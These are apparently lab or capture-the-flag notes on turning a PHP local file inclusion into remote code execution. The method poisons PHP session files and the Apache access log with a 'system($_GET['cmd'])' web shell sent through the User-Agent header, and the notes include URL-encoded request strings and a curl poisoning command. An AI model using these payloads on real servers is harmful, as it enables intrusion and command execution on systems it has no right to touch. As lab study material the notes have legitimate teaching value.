http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l
http://94.237.62.149:55216/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=id
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=pwd
http://94.237.62.149:55216/index.php?language=/var/log/apache2/access.log
Change the User-Agent to "Apache Log Poisoning" so that we can determine if we can poison the log
Then we will inject the cmd get function for the php
Don't forget the double single quote
'<?php system($_GET['cmd']); ?>'
Then just use the command "&cmd=id" so that we can see the id of the current user
/index.php?language=/var/log/apache2/access.log&cmd=id
Now we can just use any other command that the log have now poisoned
/index.php?language=/var/log/apache2/access.log&cmd=ls
/index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20
# cd /; ls
# just got url encoded
/index.php?language=/var/log/apache2/access.log&cmd=cat%20%2Fc85ee5082f4c723ace6c0796e3a3db09.txt
# just url encoded
We could also use this command to poison the apache log
curl -s "http://94.237.62.149:40752/index.php" -A "<?php system($_GET['cmd']); ?>"
Then we can just do it again with the burpsuite with this commnd
/index.php?language=/var/log/apache2/access.log&cmd=id
